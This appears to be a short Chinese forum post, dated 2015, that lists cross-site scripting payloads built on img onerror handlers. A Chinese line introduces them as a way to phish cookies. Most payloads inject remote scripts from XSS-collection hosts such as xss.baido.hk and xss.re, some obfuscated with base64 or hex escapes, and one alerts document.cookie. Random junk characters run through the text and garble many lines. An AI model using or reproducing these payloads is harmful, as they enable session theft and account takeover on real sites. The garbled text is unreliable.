<img src='non-exist.jpg'onerror="alert('xss')">
$ r! e1 E/ v' d<img src=# onerror=alert(123)>7 s' `. j' G4 X1 H! B3 d* [
<img src=# onerror=alert(document.cookie)>2 d+ d' ]8 C' E5 I/ J
下面是利用平台钓cookie的+ I* }1 N# _# e; \ l+ J
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
5 X+ O: n% Q) Q, M8 r9 d; q1 V0 b8 i3 n2 k
~6 e& A, Y& P8 F" [7 f<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>& H2 R/ s5 [0 W8 B: p
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
0 N _1 {) P# W9 I5 m“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
, B5 U. j4 Z9 V% W<img src=1 onerror=jQuery.getScript("//xss.re/974")> 9 o7 O% G7 y; `
<img src="#">
9 ~4 n5 B. Z! Z6 v$ }( e' p: ]<img src="#">7 r( o7 w! l! P: X X1 T) M
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘># M: j1 Q$ h4 A7 J1 _6 t! d
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">6 C: g7 l2 n; E* z- d
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
5 I( K; D. R, C B \3 x<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
# c& P8 V1 R9 j<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>' n+ x! P# _1 O: D: a, T5 }2 l+ k
<img src=x width="0" height="0"></img>, K/ X' z+ C+ H8 U
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
4 ^; n7 ~5 b% ~<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>
9 q7 u! Z) g( H: W |
发表于 2015-10-18 14:33:54
收藏
支持
反对